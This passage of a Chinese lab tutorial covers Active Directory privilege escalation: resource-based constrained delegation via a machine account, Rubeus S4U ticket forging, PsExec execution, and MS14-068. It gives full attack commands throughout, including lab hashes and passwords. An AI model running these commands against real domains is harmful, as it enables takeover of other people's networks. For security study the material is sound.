我们可以使用test账户创建一个机器账户,这涉及到了另外一个知识点。

默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加多达10个计算机账户,也就是说只要有一个域凭证就可以在域内任意添加机器账户。这个凭证可以是域内的用户账户、服务账户、机器账户。当然了服务账户,和域用户账户、机器账户部分可能会有些重合。

且在这里还存在一个默认的规则,使用域账户创建或加入域的机器账户自动注册SPN变为服务账户!这样我们就创建了一个SPN服务账户!

使用Powermad.ps1来添加机器账户

shell powershell.exe -exec bypass -Command "& {Import-Module C:\Users\test\Desktop\WP\Powermad-master\Powermad.ps1;New-MachineAccount -MachineAccount 0xxk -Password $(ConvertTo-SecureString "QWE123!@#" -AsPlainText -Force)}"

工具链接

https://github.com/Kevin-Robertson/Powermad

查看域computers组的用户

shell net group "domain computers" /domain

查看0xxk是否注册了SPN服务

shell setspn.exe -q */*

OK,这样0xxk机器账户就满足接受委派的要求了!

设置资源约束委派对象

这一点就像非约束委派与约束委派,必须要有足够的权限来进行设置!前两种显而易见一般都是域控拥有这个添加权限,但是基于资源的约束委派就是避免了每次都有域控去设置这一点!基于资源的约束委派对象是可以由主机本身来设置的!

那么需要需要拥有什么样的权限才可以设置呢?

分别有两种

  • 将主机加入域的域账号
  • 主机机器账号本身可以设置

那么可以就很明了了,只需要使用当前的域test账户就可以设置此账号加入域的主机委派对象了!

有两种方法可以设置资源约束委派的对象

(1)使用Empire中的powerview.ps1脚本

首先需要获取委派对象的域SID

在这里我使用empire套件中的powerview.ps1来进行获取0xxk账户SID

shell powershell.exe -exec bypass -Command "& {Import-Module .\C:\Users\test\Desktop\WP\powerview.ps1;Get-DomainComputer -Identity 0xxk -Properties objectsid}"

上面那条命令存在存在着一个bug,就是即使C:\Users\test\Desktop\WP\powerview.ps1存在。也会报错,说找不到。因此最好的解决方法是切换到WP目录下来执行如下命令

shell powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer -Identity 0xxk -Properties objectsid}"

但是CS中我使用的非交互式会话固定目录,因此写了一个shell.bat来切换目录并执行脚本。如下

cd C:\Users\test\Desktop\WP\
powershell.exe -exec bypass -Command "& {Import-Module .\powerview.ps1;Get-DomainComputer -Identity 0xxk -Properties objectsid}" > user.txt

在这里执行它,会在WP目录下输出user.txt

shell type C:\Users\test\Desktop\WP\user.txt

在这里得到SID

S-1-5-21-3502871099-3777307143-1257297015-1610

接下里继续使用Empire中的powerview.ps1脚本来添加信任,这里存在一个问题。就是执行的代码一部分是powershell的赋值代码,一部分powerview.ps1中间的模块。这些代码需要一起执行,需要将这些全部写在一个ps1文件中。如果一条条执行是不起作用的!

在这里书写shell.ps1,第一行中设置接受委派账号的域SID!最后一行的Get-DomainComputer写被攻击的机器名来设置委派关系。在这里先攻击WIN8(test将WIN8 WIN7两台机器加入域中)

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3502871099-3777307143-1257297015-1610)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Import-Module C:\Users\test\Desktop\WP\powerview.ps1
Get-DomainComputer WIN8 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

这时候将代码上传到人家机器上,并进行攻击!

shell powershell -ExecutionPolicy bypass -File ./shell.ps1

出现这样的介绍就设置成功了!

下载链接

https://github.com/EmpireProject/Empire

(2)使用AD模块增加信任关系

经过测试存在版本局限性,因此仅做WIN7的实验演示

这个模块虽然是Microsoft.ActiveDirectory.Management.dll,但是版本却和其他攻击方式中的不一样。在这里版本使用的是 6.3.9600.16384!

下载链接

https://codeload.github.com/3gstudent/test/zip/master
https://github.com/samratashok/ADModule

将代码保存在AD.ps1中,增加WIN7 与0xxk的资源委派关系

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Set-ADComputer WIN8 -PrincipalsAllowedToDelegateToAccount 0xxk$
Get-ADComputer WIN8 -Properties PrincipalsAllowedToDelegateToAccount

2012上使用命令执行代码

powershell -ExecutionPolicy bypass -File ./AD.ps1

但是会发现这个版本无法在win7 2008上都无法使用!在2012上可以使用

进行攻击

使用的工具为Rubeus,因为请求中使用的是我们加入的机器账户的NTLM HASH。因此使用命令或者自己算一下NTLM Hash值,在这里我是用Rubeus来进行计算

shell C:\WP\Rubeus35.exe hash /user:0xxk$ /password:QWE123!@# /domain:hacke.testlab

在这里得到NTLM Hash

35C83173A6FB6D142B0359381D5CC84C

接下来需要使用0xxk$账户的凭证发起请求,在这里等同于委派的服务发起请求。而0xxk$账户的凭证在Rubeus中需要使用账号密码hash来生成。

第一部分委派的SPN服务凭证

/user:0xxk$ /rc4:35C83173A6FB6D142B0359381D5CC84C

第二部分,伪造的用户和对应的服务

/impersonateuser:administrator /msdsspn:cifs/WIN8

第三部分,直接使用ptt注入到内存中来使用

/ptt

总和如下

Rubeus.exe s4u /user:0xxk$ /rc4:35C83173A6FB6D142B0359381D5CC84C /impersonateuser:administrator /msdsspn:cifs/WIN8.hacke.testlab /ptt

在这里大家肯定会发现一个问题,就是我们指定了要请求的服务!在约束委派中服务是固定的,但是在资源委派的设置中,我们可以发现只设置了委派对象,而没有设置指定的服务。因此这里我们可以指定WIN7拥有的SPN服务!

在这里有一个BUG必须和大家讲一下!这一点坑了我很久,直到对比了国内所有文章的每一步才总结出来!

首先我们看到 https://xz.aliyun.com/t/7454#toc-1 文章中,发起请求服务只写了cifs/机器名

看绿盟的文章 https://cloud.tencent.com/developer/article/1552171 ,他使用了cifs/域名全称

再看A-Team分析文章中的wireshark抓包

绿盟和A-Team均使用了域名全称来发起请求,而先知的文章则只是使用了机器名来发起请求。这一点非常的重要!

首先使用正确的方法来进行请求演示!

1.使用清空票据

shell klist purge

2.尝试访问WIN8的CIFS服务

shell dir \\WIN8\C$

3.使用工具请求伪造CIFS票据

shell C:\WP\Rubeus35.exe s4u /user:0xxk$ /rc4:35C83173A6FB6D142B0359381D5CC84C /impersonateuser:administrator /msdsspn:cifs/WIN8.hacke.testlab /ptt

4.再次请求WIN8的cifs服务

shell dir \\WIN8\C$

使用错误的方式进行请求

1.清空票据发起访问请求

shell klist purge
shell dir \\WIN8\C$

2.仅使用机器名进行票据伪造,也会提示成功

shell C:\WP\Rubeus35.exe s4u /user:0xxk$ /rc4:35C83173A6FB6D142B0359381D5CC84C /impersonateuser:administrator /msdsspn:cifs/WIN8 /ptt

3.尝试访问WIN8的CIFS服务,会发现失败!

shell dir \\WIN8\C$

这一点大家实验时需要额外关注!因为在其他攻击方法中,我没有遇到使用缩写会失败的情况。包括下面这种

在这里已经实现了访问CIFS功能,但是我们需要在上面执行命令。这个时候还需要再请求一个host服务,在这里host服务需要使用缩写,使用全称会失败!

shell C:\WP\Rubeus35.exe s4u /user:0xxk$ /rc4:35C83173A6FB6D142B0359381D5CC84C /impersonateuser:administrator /msdsspn:host/WIN8 /ptt

不管是msf还是cs,都无法使用交互式的工具才进行操作。因此需要使用单条命令来执行,在这里我使用psexec。需要注意两点,一点是需要加上accepteula来防止弹框导致的无法执行,二是因为不能回显内容,所以需要将数据写入到文件后,使用type来查看!

查看当前的机器名

shell C:\WP\PsExec.exe \\WIN8 cmd.exe /accepteula /c "hostname > c:\host.txt"

shell type \\WIN8\C$\hostname.txt

查看当前权限

shell C:\WP\PsExec.exe \\WIN8 cmd.exe /accepteula /c "whoami > c:\whoami.txt"

查看数据,可以看到是域控的administrator权限

shell type \\WIN8\C$\whoami.txt

在这里理论体系扎实的同学肯定感觉疑惑,为什么这里不是system呢?因为这里并不是psexec非交互模式进入的!而是使用当前票据请求的权限!

并且有这里的域控权限也是假的!虽然是HACKE\administrator ,但是只有本地管理员的权限。无法对域控发起请求,根据笔者的推测,原因可能是就是票据,每次发起域请求都会用到密码Hash和票据。但是这里没有,因此当前虽是域管理,实则无权限操纵域控!

绿盟的文章中写遇到了这一点,具体原理笔者不再描述。请转至如下研读

https://cloud.tencent.com/developer/article/1552171

不知道大家有没有发现,刚刚所演示的这一个点至关重要。只有通过域test账户凭证发起的请求,才能够设置WIN7 和机器账户0xxk之间的委派关系。之前加机器账户,system或者其他域权限就可以做到。设置完委派后的攻击阶段,只要机器能够访问到域控就可以了!

因此设置委派关系笔者又思考了另外两种可行的情况:

1.拿到了administrator或者system权限,但是不存在域test账户的进程。但能通过mimikatz拿到HASH破解出了明文密码。

随后使用工具lsrunas.exe来以域test账户起一个计算器进程

shell C:\Users\Administrator\Desktop\lsrunas.exe /user:test /password:QWE123!@# /domain:hacke.testlab /command:"calc.exe" /runpath:c:

随后可以看到出现了域test账户起的进程

工具链接

http://www.verydoc.com/exeshell.html

参考文章

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8/

在cs中切换进程遇到了点问题,因此生成了一个MSF的马进行权限切换。剩下的步骤和2中的环境一样,因此放在情况2中一起演示。

2.拿到了administrator或者system权限,当前机器存在域test账户进程

这个时候我们可以通过msf马,进程注入域账户test的进程中!首先找到域test账户对应的pid

ps

可以看到当前用户

使用命令注入到HACKE\test用户的进程

migrate 5024

可以看到成功降权到了域普通账户test

剩下的步骤其实和CS中是一样的,因为MSF这里使用工具也是非交互的!

pass:
在这里需要注意,我们的powerview.ps1所放的目录必须是域test普通账户能够访问的位置!

在这里已经通过基于资源的约束委派拿到WIN8的administrator权限!那么我们当前域账户test所登录的WIN7机器也可以通过同样的操作手法拿下吗?答案是不行的,因为当前WIN7上登录了域账户test,即使申请来HACKE\administrator对WIN7得票据,也无法在域test账户下对本身主机再发起请求。因此这里得解决得方式可以通过域内其他主机来进行攻击,如果当前没有其他机器得权限。那么可以在kali上配置,使用getst.py 来进行攻击。

我们换一种思考方式。拿下本机的管理员权限,就相当于提权。那么这种提权方式学名是什么呢?它的学名叫做“烂番茄”!

我们还可以通过iis等权限在域中进行提权,因为iis对域控发起请求时用的是机器账号的权限!这种方式笔者主要参考的还是A-Team得文章,并不认为这些原理分析自己写的能比他们好,因此附上链接

https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483689&idx=1&sn=1d83538cebbe2197c44b9e5cc9a7997f&chksm=eaa5bb09ddd2321fc6bc838bc5e996add511eb7875faec2a7fde133c13a5f0107e699d47840c&scene=126&sessionid=1584603915&key=cf63f0cc499df801cce7995aeda59fae16a26f18d48f6a138cf60f02d27a89b7cfe0eab764ee36c6208343e0c235450a6bd202bf7520f6368cf361466baf9785a1bcb8f1965ac9359581d1eee9c6c1b6&ascene=1&uin=NTgyNDEzOTc%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=A8KlWjR%2F8GBWKaJZTJ2e5Fg%3D&pass_ticket=B2fG6ICJb5vVp1dbPCh3AOMIfoBgH2TXNSxmnLYPig8%3D

工具准备

使用代码.net代码编译exe,查询主机加入域所使用的域账号!

using System;
using System.Security.Principal;
using System.DirectoryServices;
namespace ConsoleApp9
{
    class Program
    {
        static void Main(string[] args)
        {
            DirectoryEntry ldap_conn = new DirectoryEntry("LDAP://dc=hacke,dc=testlab");  //这里改成对方的域名
            DirectorySearcher search = new DirectorySearcher(ldap_conn);
            String query = "(&(objectClass=computer))";//查找计算机
            search.Filter = query;
            foreach (SearchResult r in search.FindAll())
            {
                String mS_DS_CreatorSID="";
                String computername = "";
                try
                {
                    computername = r.Properties["dNSHostName"][0].ToString();
                    mS_DS_CreatorSID = (new SecurityIdentifier((byte[])r.Properties["mS-DS-CreatorSID"][0], 0)).ToString();
                    //Console.WriteLine("{0} {1}\n", computername, mS_DS_CreatorSID);
                }
                catch
                {
                    ;
                }
                //再通过sid找用户名
                String UserQuery = "(&(objectClass=user))";
                DirectorySearcher search2 = new DirectorySearcher(ldap_conn);
                search2.Filter = UserQuery;


                foreach (SearchResult u in search2.FindAll())
                {
                    String user_sid = (new SecurityIdentifier((byte[])u.Properties["objectSid"][0], 0)).ToString();

                    if (user_sid == mS_DS_CreatorSID) {
                        //Console.WriteLine("debug");
                        String username = u.Properties["name"][0].ToString();
                        Console.WriteLine("[*] [{0}] -> creator  [{1}]",computername, username);
                    }
                }
            }
        }
    }
}

在编译过程中可能会报错缺少引用库,只需要加上就可以了!

并且最好多编译几个版本,4.0版本12+可以用 ,而win7 08就用不了。4.0以下的7 8都能用

参考链接

https://www.notion.so/N1CTF-King-of-phish-20f2714fc85d40a7bc0d1666b29bf43f
https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
http://blog.harmj0y.net/
https://xz.aliyun.com/t/7217#toc-1
https://xz.aliyun.com/t/6210
https://github.com/3xpl01tc0d3r/ProcessInjection
https://xz.aliyun.com/t/7517?accounttraceid=24d9a2a8373a4f06ae2ff658e447b56fqngz
https://www.freebuf.com/articles/system/198381.html
https://xz.aliyun.com/t/7454#toc-1
https://cloud.tencent.com/developer/article/1552171
https://blog.csdn.net/qq_45521281/article/details/105941102
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8/
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8/
https://blog.csdn.net/a3320315/article/details/107096250/
https://github.com/samratashok/ADModule
https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483689&idx=1&sn=1d83538cebbe2197c44b9e5cc9a7997f&chksm=eaa5bb09ddd2321fc6bc838bc5e996add511eb7875faec2a7fde133c13a5f0107e699d47840c&scene=126&sessionid=1584603915&key=cf63f0cc499df801cce7995aeda59fae16a26f18d48f6a138cf60f02d27a89b7cfe0eab764ee36c6208343e0c235450a6bd202bf7520f6368cf361466baf9785a1bcb8f1965ac9359581d1eee9c6c1b6&ascene=1&uin=NTgyNDEzOTc%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=A8KlWjR%2F8GBWKaJZTJ2e5Fg%3D&pass_ticket=B2fG6ICJb5vVp1dbPCh3AOMIfoBgH2TXNSxmnLYPig8%3D
https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/
http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
https://www.anquanke.com/post/id/220152#h2-7
https://www.anquanke.com/post/id/190625#h3-14

PAC

PAC与Kerberos的关系

0x00 PAC简介

PAC是特权属性证书,用来向Serber端表明Client的权限。

0x01 PAC介绍

当用户Client-A与Serber-B完成认证, 只是向Serber-B证明了Client-A就是所谓的Client-A,但此时Client-A如果需要访问Server-B上的网络资源,但Server-B现在其实并不直到Client-A是否有访问自身网络资源的权限(Kerberos协议中并没有关规定权限问题)

于是就巧妙的引入了PAC解决了这个问题

在一个域中,如何才能知道某个域用户所拥有的权限呢?自然是需要提供User的SID和所在组Group的SID。必须了解的一个前提是,KDC,A、B三者中,B只信任KDC所提供的关于A到底是什么权限,所以在域初始时,KDC上拥有A和B的权限。现在需要解决的是,KDC必须告诉B关于A的权限,这样B验证A的权限后才能决定让不让A访问自身的网络资源。

为了让Server-B能知道Client-A所具有的权限,微软在KRB_AS_REP中的TGT中增加了Client-A的PAC(特权属性证书 ),也就是Client-A的权限,包括Client-A的SID、Group的SID:

可以看到被KDC加密的TGT中,不仅包括了被加密的Session Keya-kdc,还包括KRB_AS_REQ中申请者(Client-A)的权限属性证书,为了防止该特权证书被篡改(即使被KDC加密,Client-A也无法轻易解密,但谁也无法保证绝对的安全),在PAC的尾部添加了两个检验ServerSignature和KDCSignature:

在这里serber Signature和KDC Signature对Client而言,Server代表的是TGS服务,KDC代表的是AS服务(AS作为Client-A与TGS的第三方信任机构)。但是AS服务与TGS服务具有相同的krgtbt账号的密码生成的,当然,整个TGT也是用KDC的密码也就是krbtgt通过它账号密码加密的,他们三者不同的是,用的算法和加密内容有所不同。

微软是这样打算的,无论如何也要把PAC从KDC传送到Serber-B,为了在Kerberos认证过程中实现,微软选择了如下做法:

将PAC放在TGT中加密后从AS服务经Client-A中转给TGS服务,再放在由TGS服务返回的ServiceTicket中加密后经Client-A中转给Serber-B

在这里需要注意的是,在KRB_TGS_REQ阶段,携带PAC的TGT被TGS服务接收后,认证Client-A的合法性后(解密Authenticator符合要求)会将PAC解密出来,验证尾部两个签名的合法性,如何合法则认为PAC没有被篡改,于是重新在PAC的尾部更换了另外两个签名,一个是Server Signature,这次是以Server-B的密码副本生成的签名(因为对于Client-A和Server-B,这次的第三方机构是TGS),另一个是KDC Signature,这次不再使用KDC的长期有效的key,而是使用在AS阶段生成的短期有效的SessionKeya-b。最后称为 新的PAC被拷贝在ST中被加密起来。

最后绕来绕去,KDC上所拥有的关于Client-A的权限证书PAC终于发给了Server-B,Server-B在对Client-A进行认证的同时,也能判断Client-A有没有访问网络资源的权限。

参考链接

https://www.freebuf.com/vuls/56081.html

MS14-068

0x00 漏洞效果

能够将任意一台域机器提升成域控相关权限

0x01 漏洞成因

首先请先了解kerberos认证与PAC,漏洞成因有三

第一个原因

在KDC机构对 PAC进行验证时,对于PAC尾部的签名算法,虽然原理上必须是带有Key的签名算法才可以,但是微软在是线上,确实允许任意签名算法。只要客户端指定任意签名算法,KDC服务器就会使用指定的算法进行签名验证!

第二个错误

PAC没有被放在TGT中,而是放在了TGS_REQ数据包的其他地方。但是KDC在实现上竟然允许这样的构造,也就是说,KDC能够正确解析出没有放在其他地方的PAC信息!

第三个错误

只要TGS_REQ按照刚才漏洞要求设置,KDC服务器会做出令人吃惊的事情:它不仅会从Authenticator中取出subkey把PAC信息解密并利用客户端设定的签名算法验证签名,同时将另外的TGT进行解密得到SeeesionKeya-kdc

最后验证成后,在PAC信息的尾部,重新采用自身的Serber_key和KDC_key生成一个带Key的签名,把SessionKeya-kdc用subkey加密,从而组合成一个新的TGT返回给Client-A。

https://www.freebuf.com/vuls/56081.html

0x02 漏洞利用条件

  • 小于2012R2的域控没有打KB3011780,高版本默认集成
  • 无论工作组、域,高低权限都可以使用生成的票据进行攻击
  • 域账户使用时需要klist purge清除票据

0x03 漏洞利用过程

WIN环境

域控08R2 192.168.60.55 hacke.top.com 机器名 WIN-1CO4ES74OQM
域成员机器 192.168.60.50 test QWE123!@#

获取某一个域用户的sid

whoami /all > sid.txt
S-1-5-21-662684005-512120196-2632585872-1105

获取域用户的明文密码

QWE123!@#

获取域名

hacke.top.com

票据生成命令

MS14-068.exe -u test@hacke.top.com -s S-1-5-21-662684005-512120196-2632585872-1105 -d 192.168.60.55 -p QWE123!@#

票据注入

kerberos::ptc TGT_test@hacke.top.com.ccache //将票据注入到内存中

通过域控的机器名进行访问

dir \\WIN-1CO4ES74OQM\C$

在这里不在域内的机器也可以

也可以使用goldenPac.exe,它可以结合psexec直接执行命令(不会弹框)

Linux版本可以使用goldenPac.py

参考链接

https://www.freebuf.com/vuls/56081.html

总结

本文大部分论点还是出于我的角度来写的,这么多知识点分开来展示可能问题不大。但是放在一起后可能会有部分的杂乱,但无疑实验肯定是能够成功的,也写上了我的观点。如委派等知识点,师傅们也可以看看其他人怎么写的。每个人的写作视角都是不同的,多看看多理解也就会了。

点击收藏 | 18 关注 | 6
登录 后跟帖